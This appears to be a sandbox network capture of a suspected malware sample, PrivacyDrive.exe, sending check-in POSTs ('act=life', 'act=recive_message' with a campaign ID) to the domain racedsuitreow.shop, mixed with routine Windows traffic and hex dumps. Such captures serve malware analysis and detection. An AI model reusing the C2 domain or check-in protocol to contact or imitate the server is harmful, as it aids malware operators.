2024-09-26 15:55:46 UTC	8000	IN	Data Raw: 1a be c0 84 9c f3 74 4b fb d5 7f 6d 6a c5 7e 4a ec 09 a3 cb bc 53 62 15 57 d4 2d c5 39 e9 87 48 6d 78 d9 43 6c da 5e e4 bb 2d c5 a7 ba 37 16 27 35 e6 65 4a 22 e3 1d 82 bb ab 4e 2d 49 fd 43 1d ac ab e5 16 29 53 e9 5d bd 7f a8 35 f1 11 99 ea c7 7c 97 64 a5 31 73 cd 9c ae 16 d7 93 00 97 44 e8 6e e0 d4 08 38 dd 9f 52 8f 2b e5 75 7f b5 c3 c9 3a 94 54 0b 55 dc e0 07 e0 77 db a2 81 50 43 d2 8d 3f d4 e9 e5 7f a8 27 b4 5d f9 72 1a 93 a9 ee 75 e8 0f f5 e4 f8 08 4b 00 7e 8c e9 85 ff 90 f7 28 0c e0 cb e3 66 08 0a a9 f4 62 60 5c 5a 57 9b e1 ed be f1 b4 77 5b a4 37 3f 67 8e 6b bb 5f 07 47 bc 31 cf 39 fc 12 30 5d f0 f8 37 67 8f 35 89 e7 44 71 2a 17 73 fc 9d f6 c5 16 f8 bb d9 6a e7 20 3f 36 b8 c5 41 a6 f5 2f 6b 69 7c c5 ca 8b b2 d5 cd d8 19 9e f5 6d 7f d7 cd 5e 0c 6f 26 Data Ascii: tKmj~JSbW-9HmxCl^-7'5eJ"N-IC)S]5\|d1sDn8R+u:TUwPC?']ruK~(fb`\ZWw[7?gk_G190]7g5Dq*sj ?6A/ki\|m^o&
2024-09-26 15:55:46 UTC	8000	IN	Data Raw: 78 be 53 f1 de 3f 88 36 2a e2 59 81 bc f0 30 ce 36 a0 0f d6 7b d7 69 21 b6 26 31 b6 8a be 0f 1b fd 6c eb 0c 1f 00 f5 15 c2 00 e8 bf 2e c7 35 00 52 db d7 85 43 18 ff c8 9f 47 31 7f db 58 e3 28 c8 c8 3c e2 2a c5 71 d0 43 85 6c 1c b4 f6 82 2a 8e 8a 9b 89 e3 52 0c 71 4c 09 89 c3 7e 01 c5 91 db 65 18 67 74 e2 00 e9 bf bb 07 1c 20 19 99 d7 d7 87 73 9a e9 4c 85 4e 3e 03 ee f4 e4 d0 32 db 46 29 89 74 cc 87 a6 f5 01 e3 7e a8 5c 06 db 1b e8 ef 20 15 fc 1d 10 f0 ff ce 96 f8 5b 2a fc b5 66 a3 8b 83 80 fc 51 25 b8 38 20 ab b5 34 b1 e8 8b 56 7d 3f bc 1c 56 f7 e7 c1 1a e0 20 fb e1 98 28 4d 4b 14 95 1f 6c 8f a0 31 f8 f2 28 63 f0 dc 58 c6 e0 8e 30 63 70 7b c8 18 dc 42 b6 99 d9 05 70 56 b8 a8 d8 59 62 b1 3d f3 0a 7a 69 55 c0 98 78 c6 61 e7 11 db b3 60 4d d7 78 c6 bb d5 cf Data Ascii: xS?6Y06{i!&1l.5RCG1X(<qClRqL~egt sLN>2F)t~\ [fQ%8 4V}?V (MKl1(cX0cp{BpVYb=ziUxa`Mx
2024-09-26 15:55:46 UTC	8000	IN	Data Raw: d6 11 63 48 74 c5 09 a7 91 44 7a 4c ab e4 f9 60 98 fa df 1f 45 6d 65 fc 40 78 63 af 33 8c cd ca 30 73 b3 82 61 e2 62 2e 33 37 39 c7 70 a9 e4 37 fd 83 52 88 23 9c 7c be 70 37 49 30 1f 24 f9 d8 50 7a 38 3b 37 ab 90 76 5e 1e 84 23 d5 73 f1 72 e3 02 35 5a f5 3a b8 34 cc 63 cc c5 23 b6 9b 63 36 c4 90 70 3c 62 5b c2 c3 a3 1b e1 fc 34 3e af 96 bf c5 0f 05 cf 79 27 5a 08 b0 ff 1d b8 da fc c7 96 4a 9f 0d 4c 9c b0 16 bb 4c 92 cb 9c 2b db dd c8 49 4d 28 84 37 2e 0e 2a e1 e6 58 71 98 1d 86 76 64 a8 fb 39 dc 9d fd db 7a f6 04 9c 50 ac 65 4f 3c 0c e8 25 b1 d2 3c 08 4a 48 e4 a6 e9 3c 69 a7 3b c6 e0 f5 f3 3b b1 98 b5 95 46 74 70 c9 c7 24 88 95 7b 21 26 5b ff 2d 9b 1e 70 2f 40 63 8e a5 9c c0 cc 19 78 c0 f0 be 4c 3c 60 38 75 11 9a 9b 7e 24 66 24 9a f8 f1 36 5e df 4e 9f ca Data Ascii: cHtDzL`Eme@xc30sab.379p7R#\|p7I0$Pz8;7v^#sr5Z:4c#c6p<b[4>y'ZJLL+IM(7.*Xqvd9zPeO<%<JH<i;;Ftp${!&[-p/@cxL<`8u~$f$6^N
2024-09-26 15:55:46 UTC	8000	IN	Data Raw: 52 cd 42 1e af 88 ff da b5 77 2e 4c 2c 14 b8 30 31 87 27 6a c6 72 c9 03 97 70 fe fa ec 44 a5 40 9d b8 c1 87 72 94 e7 da e9 de 79 3e ca 27 05 7f 01 0a 57 91 91 a9 fc 57 94 32 e6 00 a3 08 c5 9a 39 28 d4 cc 91 bc 7c 43 72 84 b9 63 f3 ff f2 96 aa 87 08 ef c4 fd 06 0b a7 ac 04 8e 56 24 1a 82 0a 3f 73 94 07 bf 1f 13 7e 8e ce 6f cb 0d dc 4a 65 b0 30 e4 a4 52 1c c6 6b c8 fe 40 70 73 bd 10 f8 21 54 ab 33 ba 15 93 a4 05 2e a1 de 76 a2 5b 9b 75 c2 6a f6 b3 0e 7f 42 25 f5 d1 92 9a 26 8e bc f9 47 94 50 40 86 ff 79 0e ea 6e 6d 2d 3b 99 2f 79 08 14 2a 69 08 d1 34 43 34 a1 50 c9 ba 50 49 cd 75 db e6 12 39 ff 86 d6 2d 10 5e a3 b5 1b 34 66 06 97 7b f0 96 d3 5a 92 87 66 6d 54 ce cb 46 bd c8 d3 3e c6 9d 7c e1 ea 18 2a e6 fd 92 74 69 5d 75 b0 10 8d 05 9d c4 2b ad 01 bb b9 23 Data Ascii: RBw.L,01'jrpD@ry>'WW29(\|CrcV$?s~oJe0Rk@ps!T3.v[ujB%&GP@ynm-;/yi4C4PPIu9-^4f{ZfmTF>\|ti]u+#
2024-09-26 15:55:46 UTC	8000	IN	Data Raw: d4 e9 fb aa cc ff 23 fa 36 29 b3 13 e8 db 7e 4e f4 6d bf 24 e9 db 7e 49 d1 77 c5 a5 4b e0 f6 8b 47 e0 a7 04 9d c0 ef 12 ce 81 c0 e3 8c 95 9a 3e 47 8c c4 6e 4f d4 98 c7 2b 57 56 d8 d6 fd b3 c0 6e e1 d6 80 a0 be 05 25 45 c2 bd 8c dc ba db 16 44 54 72 ab 4e 5a ea 89 bc 3f 03 c2 de e7 55 a0 21 3f 8a 36 59 e6 3a 25 b9 a2 72 8b 99 85 53 82 99 94 45 2b 9d bf 50 e4 bf 34 5f 20 6d 72 e3 83 25 45 2a 01 e2 9d 4a 5e 91 9e 68 4e 93 e1 48 82 3b d5 0a 3e 00 e7 64 9f 0d 44 cf cf 3e 7b 68 7e 2a fb ec bf cd bf 04 ec b3 ab a2 69 e5 bf 99 9f ca 9e 48 e6 5d 1a f7 23 56 a6 d5 9f bb e7 a5 ea 4f fe bc 8b 6a 1f 55 ed cd 15 23 dc de fc 53 7e 45 6c a9 66 6f 0e 9d b9 2c 3e 63 d2 6c 30 3a 6f fc 57 66 74 6e 75 c2 f5 b0 56 e7 14 b3 f3 c3 f6 34 cc ce 49 ec b3 5f b7 9f 9b 7d f6 8c 2d f5 Data Ascii: #6)~Nm$~IwKG>GnO+WVn%EDTrNZ?U!?6Y:%rSE+P4_ mr%EJ^hNH;>dD>{h~iH]#VOjU#S~Elfo,>cl0:oWftnuV4I_}-
2024-09-26 15:55:46 UTC	8000	IN	Data Raw: ec 11 34 6d 3b ec a6 e8 71 16 52 e4 a7 38 f5 42 ff af 0d 45 1f a0 3a 65 04 0d c0 30 c1 6c 00 c5 9d ab 20 56 97 93 9b 0c eb 20 d6 09 f4 68 92 a6 90 bc 1f a7 64 6d b5 b8 f2 0a a4 2f 84 48 22 1b 5b 80 d7 08 71 c2 50 06 97 6d 0d 90 13 6c 7d b3 a4 63 42 18 29 7d 2b e7 1a e5 1b d4 7e 82 9f ab c3 d5 99 51 80 47 51 72 2c d8 d6 43 ad a9 f5 41 a9 b4 80 56 b3 45 6f bd 43 8a 5c 07 a7 73 81 7b aa f5 e8 22 30 c4 5f 06 ae 5f e4 6a 38 83 46 b2 72 d4 14 2b 84 16 8d ed 90 28 f9 0a 1f 0a 84 f1 89 d3 32 00 47 80 67 74 94 fc 08 b4 4d 58 8d c4 64 43 9a 06 39 cd 1c 0b e5 34 0a 38 89 1d e0 2c 91 30 62 80 01 e5 be 33 6e 5c ac 69 c4 5e 76 dc de 11 07 d9 71 07 5b c0 cc 1f 78 47 35 08 43 a1 1c 3b f0 92 8f db 89 7f 52 1c 7b 88 39 15 d6 fc 15 0c 89 62 4e 31 58 c9 93 8f 55 ce 2a c8 22 Data Ascii: 4m;qR8BE:e0l V hdm/H"[qPml}cB)}+~QGQr,CAVEoC\s{"0__j8Fr+(2GgtMXdC948,0b3n\i^vq[xG5C;R{9bN1XU*"
2024-09-26 15:55:46 UTC	8000	IN	Data Raw: a6 38 64 4d 54 9f 7d 27 c6 eb 2f 9e 3b ab 62 fa 8b 75 cc fe 02 8f 49 c1 82 c9 13 e8 36 ac fc 73 13 a6 e7 d6 d7 8d f4 6c 78 75 24 3d f3 23 66 8f 4e 4f eb 28 fd 05 1e b6 60 a1 6d 6b c9 e4 e0 c2 c9 df 86 c8 6c 3d 41 2f e5 79 68 e8 3e b5 8a 2c 4a 21 d8 77 2a 49 2a 10 be 0c e8 5e 04 44 07 56 8b cd e1 87 3c 49 09 e8 9d de 35 81 fd 9b 2b ba c5 a2 56 19 2d 38 0c 70 be 5e b2 76 f4 0d 9c ca cf 4d 24 ff 59 f1 f9 6b eb c7 70 c3 78 f9 37 4c 24 7f 6b 7c fe da 7a b3 7b f4 fc 89 49 d9 8b d2 14 7c 1e 57 9f 5d ea 13 8f 3b d5 f2 fb c6 2f 5f be 23 5d bf 6c 15 b1 ec be ab 4a 95 2b d1 f7 a6 6d 7a 68 07 0b b0 fe d2 b4 53 8f df ad 87 f6 44 53 a0 e0 a9 e9 90 26 08 6a 7a 4f fd b2 4a 6a 6a 55 6f 61 85 5a 50 ae 23 ff db 4c f5 0e 56 d3 5e 3d 1f bc 70 c2 71 dc d8 56 41 12 dc 3f 7a fc Data Ascii: 8dMT}'/;buI6slxu$=#fNO(`mkl=A/yh>,J!wI^DV<I5+V-8p^vM$Ykpx7L$k\|z{I\|W];/_#]lJ+mzhSDS&jzOJjjUoaZP#LV^=pqVA?z
2024-09-26 15:55:46 UTC	8000	IN	Data Raw: 2f 0e e7 ff 51 b8 5b 14 bf 7c be 11 55 be d3 22 ff 95 c7 c3 e5 db a4 7c 2c 53 d2 b6 51 c8 97 31 5d fc 60 a7 b0 c8 a4 e5 2c 5e 14 73 4c 6b f8 09 08 cf 5e e6 14 6f 9a 16 35 06 4f bf eb 2e 6b ea eb 4f 54 6a 65 22 f1 7f 5e 23 6f 56 d7 2c 2b ad db f9 d8 a1 bb cf 7a 48 c3 09 ac b4 0e d2 fd 01 11 6e 9d 35 9c 5f 86 3b e3 21 8d 32 dc 8b 3c 9c f7 41 23 89 2b 81 0f 78 88 5f e2 8f 0b bc c4 c0 17 02 ef f7 90 56 89 df 2b f0 59 8e d7 4b ce 3a 5e 77 9f d9 fb 79 c2 f8 03 8c 18 30 88 7e 4e e0 dc 65 82 51 a2 fb 78 79 ee b3 e6 97 95 60 42 78 8e 8d fa fa be 41 64 e5 77 d6 ac bc 2a b3 92 60 66 f9 70 ab 08 f7 ac 35 5c 8b 59 34 46 96 5f e1 e1 bc ff 60 64 69 95 2c 12 23 cb 41 81 df 69 e0 8b 64 91 18 59 fe 7b 81 df c8 b2 9c c0 32 78 96 67 30 32 ef 30 f6 50 59 e6 06 be e2 57 fa 77 Data Ascii: /Q[\|U"\|,SQ1]`,^sLk^o5O.kOTje"^#oV,+zHn5_;!2<A#+x_V+YK:^wy0~NeQxy`BxAdw*`fp5\Y4F_`di,#AidY{2xg020PYWw

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.16	49829	172.67.206.221	443	4252	C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:57 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: racedsuitreow.shop
2024-09-26 15:55:57 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 15:55:57 UTC	557	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 15:55:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qR%2FEeuNyem%2BZvfuRQ8PWnAUGTNpINbFHx6YX%2FKf3LjL3gzhrxKUlEamKFtf2kTD4p276cgSCyRCah5Mytex4bMHr%2FnR%2FEEtEnyXK1HIvfEUMlZrMv7GGPbg%2BWdrTxdvKiXyTmlg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c9470f42f8f7c8d-EWR
2024-09-26 15:55:57 UTC	812	IN	Data Raw: 31 31 32 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 112d<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-09-26 15:55:57 UTC	1369	IN	Data Raw: 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 Data Ascii: tyles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById
2024-09-26 15:55:57 UTC	1369	IN	Data Raw: 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 31 5f 51 6d 77 76 70 56 32 63 62 79 30 49 44 7a 31 52 4a 33 75 61 55 73 64 4b 4b 66 70 6e 69 76 59 59 56 4b 4d 36 31 37 48 64 38 2d 31 37 32 37 33 36 36 31 35 37 2d 30 2e 30 2e 31 2e 31 2d 2f 61 70 69 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 Data Ascii: > <input type="hidden" name="atok" value="1_QmwvpV2cby0IDz1RJ3uaUsdKKfpnivYYVKM617Hd8-1727366157-0.0.1.1-/api"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-b
2024-09-26 15:55:57 UTC	855	IN	Data Raw: 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c Data Ascii: ator sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudfl
2024-09-26 15:55:57 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.16	49830	172.67.206.221	443	4252	C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:58 UTC	355	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Cookie: __cf_mw_byp=1_QmwvpV2cby0IDz1RJ3uaUsdKKfpnivYYVKM617Hd8-1727366157-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 49 Host: racedsuitreow.shop
2024-09-26 15:55:58 UTC	49	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 4a 45 63 61 47 2d 2d 72 75 69 31 32 32 32 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=yJEcaG--rui1222&j=
2024-09-26 15:55:59 UTC	768	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 15:55:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=2r8047vel3u19ds31isgthv5je; expires=Mon, 20 Jan 2025 09:42:37 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LtbzMEYvoVV3zmY7xgOSGewD9dixMhM9OMr3ndvfVgSvlvG108F9XTAwQFqbUCAiPGPfJz5CFxSTRZdNBCkLIhubTvNR01ltxpG%2B5wK8Tr2k3GEXfLr1KAZoJARLiz4ElG7KETM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c9470fb8b3f4273-EWR
2024-09-26 15:55:59 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 15:55:59 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
83	192.168.2.16	49831	40.126.32.68	443

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:56:00 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 4737 Host: login.live.com
2024-09-26 15:56:00 UTC	4737	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-09-26 15:56:01 UTC	569	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Thu, 26 Sep 2024 15:55:01 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C538_BL2 x-ms-request-id: da74c1fd-4863-4bda-ae65-e66e1689f86b PPServer: PPV: 30 H: BL02EPF0001D8FE V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Thu, 26 Sep 2024 15:56:00 GMT Connection: close Content-Length: 10921
2024-09-26 15:56:01 UTC	10921	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.16	49834	52.165.165.26	443

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:56:08 UTC	306	OUT	GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=SBWgPo8m6MLKgX2&MD=VCxfKomC HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-09-26 15:56:08 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440" MS-CorrelationId: 7bda86a4-2a3c-417a-b04b-49f13cb85639 MS-RequestId: f7f38fef-71a4-4e4d-8d65-ef3a9e2118eb MS-CV: YAKXOq7KZ0it9ASl.0 X-Microsoft-SLSClientCache: 1440 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Thu, 26 Sep 2024 15:56:07 GMT Connection: close Content-Length: 30005
2024-09-26 15:56:08 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK\|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
